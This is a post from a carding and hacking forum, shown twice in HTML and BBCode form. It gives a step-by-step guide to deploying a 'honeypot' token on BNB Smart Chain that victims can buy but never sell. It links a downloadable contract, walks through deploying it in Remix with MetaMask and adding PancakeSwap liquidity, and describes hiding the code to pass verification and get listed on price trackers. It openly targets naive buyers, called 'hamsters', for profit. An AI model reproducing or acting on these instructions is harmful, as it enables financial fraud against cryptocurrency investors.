Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Payment Systems & Bank Carding
Create your own Honeypot cypto + file with smart-contract [2023]
Message
<blockquote data-quote="Geniu" data-source="post: 828" data-attributes="member: 13"><p><strong>Download smart-contract here:</strong></p><p><img src="https://mega.nz/rich-file.png" alt="mega.nz" class="fr-fic fr-dii fr-draggable " style="" /></p><h4><a href="https://mega.nz/file/kGxymRJb#aiEn6GgUBetKgDX23zJv9bcocMtYtzW-dNt_V8yOGA0" target="_blank">1.2 KB file on MEGA</a></h4><p></p><p><img src="https://mega.nz/favicon.ico?v=3" alt="mega.nz" class="fr-fic fr-dii fr-draggable " style="" /> mega.nz</p><p>Great time of the day everyone. The scheme really works and is popular.</p><p></p><p><img src="https://telegra.ph/file/61f04962238f03fff1d11.jpg" alt="61f04962238f03fff1d11.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Found transactions for the day in such projects.</p><p></p><p>I'm afraid to even imagine how much this manual costs.</p><p></p><p>Over the last 6 years, the number of confirmed users of cryptocurrency has increased 44 times.</p><p></p><p>Users are investing their money in cryptocurrency, hoping for rapid growth of their capital. In this regard, new ways of scamming and new hamsters appear, which gives us a good way to make money.</p><p></p><p>Graph of user growth in cryptocurrency</p><p></p><p><img src="https://telegra.ph/file/2800f71e30cb0f50506fc.png" alt="2800f71e30cb0f50506fc.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>So, you have seen a little statistics for understanding. Now let's understand what a "Honeypot token" is.</p><p></p><p>Honeypot token is a coin that users can buy, but can not sell (Or they can sell, but with a huge commission (99.9%) - which is illegal), so we will consider the option with a complete ban on selling (the option is legal - because at the time of purchase the user takes all the risks on himself).</p><p></p><p>Example of a coin chart with a ban on sale</p><p></p><p><img src="https://telegra.ph/file/e3f3ee104983a0d7bc1fe.png" alt="e3f3ee104983a0d7bc1fe.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>We will not consider the network ERC-20 (Ether), as high commissions (from 10$ to 150$) and low purchasing power of hamsters (it is easier to find 50 hamsters, which will inject 15$ with a commission of 0.05$, than 3 hamsters, which will inject 250$ with a commission of 35$).</p><p></p><p>So let's consider the BEP-20 (bnb) network.</p><p></p><p>Honeypot has additional features such as.</p><p></p><p>increased capitalization (after a $10 transaction, the total value of the token grows by $1,000).</p><p></p><p>autosale (to maintain the visibility of the token's tradability).</p><p></p><p>code hiding (to enable verification of the token on the website - bscscan.com; as well as for placing the token on price tracking websites - coinmarketcap.com and coingecko.com).</p><p></p><p>Such features allow to minimize the risks of a coin being found out to be a scam, as well as increase users' trust in them.</p><p></p><p>Let's move on to creating our token:</p><p></p><p>To create our token, we need a script (development code)</p><p></p><p>Creating a token</p><p></p><p>1. Go to <a href="https://remix.ethereum.org/" target="_blank">https://remix.ethereum.org/</a>.</p><p></p><p>2. Click on the "Upload file" button</p><p></p><p><img src="https://telegra.ph/file/efa49ff750a792efe32a8.png" alt="efa49ff750a792efe32a8.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>3. Select our script (with the format .sol)</p><p></p><p><img src="https://telegra.ph/file/bb98e7fb53a266f5cb6cd.png" alt="bb98e7fb53a266f5cb6cd.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>4. Edit the code to suit your needs</p><p></p><p>Change the contract and name lines to the name of our token (Example - SafeFloki).</p><p></p><p>In the symbol line change it to an abbreviated name (Example - SFL).</p><p></p><p>In the line totalSupply change the total number of coins to be issued.</p><p></p><p><img src="https://telegra.ph/file/1621a58bb38de774ce644.png" alt="1621a58bb38de774ce644.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>5. Compile the code</p><p></p><p>1. In the column on the left, select the underlined icon</p><p></p><p>2. Look at the language version in our script (0.5.17 as an example).</p><p></p><p>3. In the Compiler tab, select the appropriate version (as specified in the code)</p><p></p><p><img src="https://telegra.ph/file/5ffb081de10fee037f488.png" alt="5ffb081de10fee037f488.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>4. After that, click on the big blue button at the bottom "Compile YourContractName.sol"</p><p></p><p>6. Deploy the contract</p><p></p><p>Environment: select Injected Web3</p><p></p><p>Account: select your Metamask wallet (Binance Smart Chain network).</p><p></p><p>Contract: Choose your contract</p><p></p><p>Click the orange Deploy button</p><p></p><p><img src="https://telegra.ph/file/f38fb29618fc145907583.png" alt="f38fb29618fc145907583.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>7.</strong> Confirm the transaction</p><p></p><p><img src="https://telegra.ph/file/0b296539b7f40ee83067c.png" alt="0b296539b7f40ee83067c.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Token is ready!</p><p></p><p>Let's move on to adding liquidity to the pool on the PancakeSwap exchange.</p><p></p><p>Add liquidity to the PancakeSwap exchange.</p><p></p><p><strong>1.</strong> Send BNB to the address of the created contract</p><p></p><p>To add liquidity you need to send more than 0.01 bnb, if you sent less, it's okay, send more bnb in the next transaction.</p><p></p><p>Copy the contract address (Click on the icon on the screenshot)</p><p></p><p><img src="https://telegra.ph/file/0583295999fa6625ac866.png" alt="0583295999fa6625ac866.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>2.</strong> Open metamask and click "Submit"</p><p></p><p><img src="https://telegra.ph/file/acec315be6463c39127e8.png" alt="acec315be6463c39127e8.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>3.</strong> Insert the address of our contract</p><p></p><p><img src="https://telegra.ph/file/d8a3e04be468bec09c3e3.png" alt="d8a3e04be468bec09c3e3.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><strong>4.</strong> Send 0.01 bnb or more</p><p></p><p><img src="https://telegra.ph/file/7cf079ca4a9758809f972.png" alt="7cf079ca4a9758809f972.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Click Next</p><p></p><p>5. Confirm the transaction</p><p></p><p><img src="https://telegra.ph/file/14845a8ec41ebff495430.png" alt="14845a8ec41ebff495430.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Adding liquidity:</p><p></p><p>1. Back to the contract deployment tab and spin down to the contract address</p><p></p><p>2. Click on the "Add Liquidity" button</p><p></p><p><img src="https://telegra.ph/file/82b2ad4162fd12b11874d.png" alt="82b2ad4162fd12b11874d.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>3. Confirm the transaction</p><p></p><p><img src="https://telegra.ph/file/a543cb7bcfd3107d6d67b.png" alt="a543cb7bcfd3107d6d67b.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Done!!! Our contract will automatically add a liquidity pair to PancakeSwap and add the created tokens to our wallet.</p></blockquote><p></p>
[QUOTE="Geniu, post: 828, member: 13"] [B]Download smart-contract here:[/B] [IMG alt="mega.nz"]https://mega.nz/rich-file.png[/IMG] [HEADING=3][URL='https://mega.nz/file/kGxymRJb#aiEn6GgUBetKgDX23zJv9bcocMtYtzW-dNt_V8yOGA0']1.2 KB file on MEGA[/URL][/HEADING] [IMG alt="mega.nz"]https://mega.nz/favicon.ico?v=3[/IMG] mega.nz Great time of the day everyone. The scheme really works and is popular. [IMG alt="61f04962238f03fff1d11.jpg"]https://telegra.ph/file/61f04962238f03fff1d11.jpg[/IMG] Found transactions for the day in such projects. I'm afraid to even imagine how much this manual costs. Over the last 6 years, the number of confirmed users of cryptocurrency has increased 44 times. Users are investing their money in cryptocurrency, hoping for rapid growth of their capital. In this regard, new ways of scamming and new hamsters appear, which gives us a good way to make money. Graph of user growth in cryptocurrency [IMG alt="2800f71e30cb0f50506fc.png"]https://telegra.ph/file/2800f71e30cb0f50506fc.png[/IMG] So, you have seen a little statistics for understanding. Now let's understand what a "Honeypot token" is. Honeypot token is a coin that users can buy, but can not sell (Or they can sell, but with a huge commission (99.9%) - which is illegal), so we will consider the option with a complete ban on selling (the option is legal - because at the time of purchase the user takes all the risks on himself). Example of a coin chart with a ban on sale [IMG alt="e3f3ee104983a0d7bc1fe.png"]https://telegra.ph/file/e3f3ee104983a0d7bc1fe.png[/IMG] We will not consider the network ERC-20 (Ether), as high commissions (from 10$ to 150$) and low purchasing power of hamsters (it is easier to find 50 hamsters, which will inject 15$ with a commission of 0.05$, than 3 hamsters, which will inject 250$ with a commission of 35$). So let's consider the BEP-20 (bnb) network. Honeypot has additional features such as. increased capitalization (after a $10 transaction, the total value of the token grows by $1,000). autosale (to maintain the visibility of the token's tradability). code hiding (to enable verification of the token on the website - bscscan.com; as well as for placing the token on price tracking websites - coinmarketcap.com and coingecko.com). Such features allow to minimize the risks of a coin being found out to be a scam, as well as increase users' trust in them. Let's move on to creating our token: To create our token, we need a script (development code) Creating a token 1. Go to [URL]https://remix.ethereum.org/[/URL]. 2. Click on the "Upload file" button [IMG alt="efa49ff750a792efe32a8.png"]https://telegra.ph/file/efa49ff750a792efe32a8.png[/IMG] 3. Select our script (with the format .sol) [IMG alt="bb98e7fb53a266f5cb6cd.png"]https://telegra.ph/file/bb98e7fb53a266f5cb6cd.png[/IMG] 4. Edit the code to suit your needs Change the contract and name lines to the name of our token (Example - SafeFloki). In the symbol line change it to an abbreviated name (Example - SFL). In the line totalSupply change the total number of coins to be issued. [IMG alt="1621a58bb38de774ce644.png"]https://telegra.ph/file/1621a58bb38de774ce644.png[/IMG] 5. Compile the code 1. In the column on the left, select the underlined icon 2. Look at the language version in our script (0.5.17 as an example). 3. In the Compiler tab, select the appropriate version (as specified in the code) [IMG alt="5ffb081de10fee037f488.png"]https://telegra.ph/file/5ffb081de10fee037f488.png[/IMG] 4. After that, click on the big blue button at the bottom "Compile YourContractName.sol" 6. Deploy the contract Environment: select Injected Web3 Account: select your Metamask wallet (Binance Smart Chain network). Contract: Choose your contract Click the orange Deploy button [IMG alt="f38fb29618fc145907583.png"]https://telegra.ph/file/f38fb29618fc145907583.png[/IMG] [B]7.[/B] Confirm the transaction [IMG alt="0b296539b7f40ee83067c.png"]https://telegra.ph/file/0b296539b7f40ee83067c.png[/IMG] Token is ready! Let's move on to adding liquidity to the pool on the PancakeSwap exchange. Add liquidity to the PancakeSwap exchange. [B]1.[/B] Send BNB to the address of the created contract To add liquidity you need to send more than 0.01 bnb, if you sent less, it's okay, send more bnb in the next transaction. Copy the contract address (Click on the icon on the screenshot) [IMG alt="0583295999fa6625ac866.png"]https://telegra.ph/file/0583295999fa6625ac866.png[/IMG] [B]2.[/B] Open metamask and click "Submit" [IMG alt="acec315be6463c39127e8.png"]https://telegra.ph/file/acec315be6463c39127e8.png[/IMG] [B]3.[/B] Insert the address of our contract [IMG alt="d8a3e04be468bec09c3e3.png"]https://telegra.ph/file/d8a3e04be468bec09c3e3.png[/IMG] [B]4.[/B] Send 0.01 bnb or more [IMG alt="7cf079ca4a9758809f972.png"]https://telegra.ph/file/7cf079ca4a9758809f972.png[/IMG] Click Next 5. Confirm the transaction [IMG alt="14845a8ec41ebff495430.png"]https://telegra.ph/file/14845a8ec41ebff495430.png[/IMG] Adding liquidity: 1. Back to the contract deployment tab and spin down to the contract address 2. Click on the "Add Liquidity" button [IMG alt="82b2ad4162fd12b11874d.png"]https://telegra.ph/file/82b2ad4162fd12b11874d.png[/IMG] 3. Confirm the transaction [IMG alt="a543cb7bcfd3107d6d67b.png"]https://telegra.ph/file/a543cb7bcfd3107d6d67b.png[/IMG] Done!!! Our contract will automatically add a liquidity pair to PancakeSwap and add the created tokens to our wallet. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Payment Systems & Bank Carding
Create your own Honeypot cypto + file with smart-contract [2023]
Top